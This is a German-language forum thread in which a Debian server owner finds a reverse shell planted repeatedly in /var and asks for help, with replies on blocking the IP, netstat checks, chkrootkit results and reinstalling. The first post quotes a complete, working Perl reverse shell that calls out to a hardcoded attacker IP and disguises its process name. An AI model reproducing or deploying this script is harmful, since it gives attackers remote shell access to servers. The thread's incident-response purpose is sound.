#1 3. Mai 2009 Ich habe eben im verzeichnis /var hunderte datein gefunden in der immer volgender inhalt steht: Code: #!/usr/bin/perl -w # perl-reverse-shell - A Reverse Shell implementation in PERL # Copyright (C) 2006 pentestmonkey@pentestmonkey.net # # This tool may be used for legal purposes only. Users take full responsibility # for any actions performed using this tool. The author accepts no liability # for damage caused by this tool. If these terms are not acceptable to you, then # do not use this tool. # # In all other respects the GPL version 2 applies: # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # This tool may be used for legal purposes only. Users take full responsibility # for any actions performed using this tool. If these terms are not acceptable to # you, then do not use this tool. # # You are encouraged to send comments, improvements or suggestions to # me at pentestmonkey@pentestmonkey.net # # Description # ----------- # This script will make an outbound TCP connection to a hardcoded IP and port. # The recipient will be given a shell running as the current user (apache normally). # use strict; use Socket; use FileHandle; use POSIX; my $VERSION = "1.0"; # Where to send the reverse shell. Change these. my $ip = '193.109.140.132'; my $port = 3137; # Options my $daemon = 1; my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell my $authorised_client_pattern = qr(^127\.0\.0\.1$); # Declarations my $global_page = ""; my $fake_process_name = "/usr/sbin/apache"; # Change the process name to be less conspicious $0 = "[httpd]"; # Authenticate based on source IP address if required if (defined($ENV{'REMOTE_ADDR'})) { cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); if ($auth) { unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { cgiprint("ERROR: Your client isn't authorised to view this page"); cgiexit(); } } } elsif ($auth) { cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); cgiexit(0); } # Background and dissociate from parent process if required if ($daemon) { my $pid = fork(); if ($pid) { cgiexit(0); # parent exits } setsid(); chdir('/'); umask(0); } # Make TCP connection for reverse shell socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { cgiprint("Sent reverse shell to $ip:$port"); cgiprintpage(); } else { cgiprint("Couldn't open reverse shell to $ip:$port: $!"); cgiexit(); } # Redirect STDIN, STDOUT and STDERR to the TCP connection open(STDIN, ">&SOCK"); open(STDOUT,">&SOCK"); open(STDERR,">&SOCK"); $ENV{'HISTFILE'} = '/dev/null'; system("w;uname -a;id;pwd;echo Welcome"); exec({"/bin/sh"} ($fake_process_name, "-i")); # Wrapper around print sub cgiprint { my $line = shift; $line .= "<p>\n"; $global_page .= $line; } # Wrapper around exit sub cgiexit { cgiprintpage(); exit 0; # 0 to ensure we don't give a 500 response. } # Form HTTP response using all the messages gathered by cgiprint so far sub cgiprintpage { print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page; } Ich hab als OS Debian. Was hat das zu bedeuten, hat irgend jemand wirklich zugang zu meinen Server? Falls ja, was kan ich jetzt sinvolles tun? Löschen bringt nichts da alle paar sekunden neue datein mit dem selben inhalt geschrieben werden.
#2 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Block doch einfach die IP "193.109.140.132". Sollte mittels IPtables möglich sein.
#3 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Auf die Idee bin ich auch gekommen, hab das grad mal gemacht aber es werden immernoch "prs2.pl.1" datein erstellt, wobei X ein zähler ist. Code: node12126:/var# ls -la total 96 drwxr-xr-x 17 root root 28672 May 3 15:24 . drwxr-xr-x 21 root root 4096 Apr 30 05:18 .. drwxr-xr-x 2 root root 4096 May 3 06:28 backups drwxr-xr-x 10 root root 4096 Apr 25 02:14 cache drwxr-xr-x 8 drweb drweb 4096 Apr 24 09:04 drweb drwxr-xr-x 30 root root 4096 May 3 02:31 lib drwxrwsr-x 2 root staff 4096 Oct 28 2006 local drwxrwxrwt 5 root root 4096 May 3 02:25 lock drwxr-xr-x 11 root root 4096 May 3 06:47 log drwxrwsr-x 2 root mail 4096 Apr 23 23:23 mail drwxr-xr-x 3 root root 4096 Apr 24 09:04 named drwxr-xr-x 2 root root 4096 Apr 23 23:23 opt [COLOR=Red][B]-rw-r--r-- 1 root root 3731 Apr 8 14:21 prs2.pl[/B][/COLOR] drwxr-xr-x 11 root root 4096 Apr 24 09:04 qmail drwxr-xr-x 11 root root 4096 May 3 12:46 run drwxr-xr-x 4 root root 4096 Apr 24 09:04 spool drwxrwxrwt 2 root root 4096 Apr 28 23:06 tmp drwxr-xr-x 5 root root 4096 Apr 24 09:04 www Gibt es eine möglichkeit herauszufinden wie die datei erstellt wurde? Die IP hab ich jetzt gespeert. Code: node12126:/var# iptables -L INPUT Chain INPUT (policy ACCEPT) target prot opt source destination DROP 0 -- 193.109.140.132 anywhere
#4 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Naja offensichtlich unter rootrechten. Wie genau kann man glaube ich nicht sagen. Was für eine Disti nutzt du? Das skript sieht ein bisschen so aus wie für Debian/Ubuntu. Beende mal deinen Apache (/etc/init.d/apache stop) und schau ob nicht noch immer ein Prozess (cmd [httpd] bzw. apache) offen ist. Falls ja ist es offensichtlich der Prozess von der Reverse Shell... Falls nicht versuch mal mit netstat -apn zu schauen ob auf Port 3137 eine Verbindung offen ist. Falls ja, von welchem Prozess diese erzeugt wurde.
#5 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Ja es ist Debian. Es liefen noch httpd prozesse, diese hab ich gekillt und nach ca 1 - 3 Sekunden starten die prozesse neu. Code: tcp 0 1 85.xx.xx.xx:46182 193.109.140.132:3137 SYN_SENT 13068/[httpd] tcp 0 1 85.xx.xx.xx:46186 193.109.140.132:3137 SYN_SENT 13118/[httpd] tcp 0 1 85.xx.xx.xx:46184 193.109.140.132:3137 SYN_SENT 13093/[httpd] Ich hab jetzt chkrootkit installiert und ausgeführt. Weiß jetzt aber nicht wie ich weiter vorgehen soll. Code: node12126:~/bin/chkrootkit-0.48# ./chkrootkit ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not found Checking `su'... not infected Checking `ifconfig'... [COLOR="Red"]INFECTED[/COLOR] Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... not infected Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not found Checking `mail'... not infected Checking `mingetty'... not found Checking `netstat'... [COLOR="Red"]INFECTED[/COLOR] Checking `named'... not infected Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... [COLOR="Red"]INFECTED[/COLOR] Checking `rpcinfo'... not infected Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not infected Checking `sshd'... not infected Checking `syslogd'... not infected Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... [COLOR="Red"]INFECTED[/COLOR] Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not infected Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... no suspect files Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... [COLOR="Red"]Possible t0rn v8 \(or variation\) rootkit installed[/COLOR] Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... /lib/init/rw/.ramfs Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... [COLOR="Red"]Warning: Possible Showtee Rootkit installed[/COLOR] Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for LOC rootkit... nothing found Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h Searching for ****it rootkit... nothing found Searching for Volc rootkit... nothing found Searching for Gold2 rootkit... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... nothing found Searching for AjaKit rootkit default files and dirs... nothing found Searching for zaRwT rootkit default files and dirs... nothing found Searching for Madalin rootkit default files... nothing found Searching for Fu rootkit default files... nothing found Searching for ESRK rootkit default files... nothing found Searching for rootedoor... nothing found Searching for ENYELKM rootkit default files... nothing found Searching for common ssh-scanners default files... nothing found Searching for suspect PHP files... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... [COLOR="Red"]INFECTED (PORTS: 465)[/COLOR] Checking `lkm'... You have 20 process hidden for readdir command You have 628 process hidden for ps command chkproc: [COLOR="Red"]Warning: Possible LKM Trojan installed[/COLOR] chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... chklastlog: nothing deleted Checking `chkutmp'... chkutmp: nothing deleted node12126:~/bin/chkrootkit-0.48#
#6 24. Juni 2009 AW: Auf meinem Rootserver ist eine reverse shell! Sicher deine Daten und reinstall das System. Aktuelles Debianb 5.0.1 Dann Server absichern. Backups wieder einspeisen. EDIT: ah sry ^^ datum nicht gesehen ^^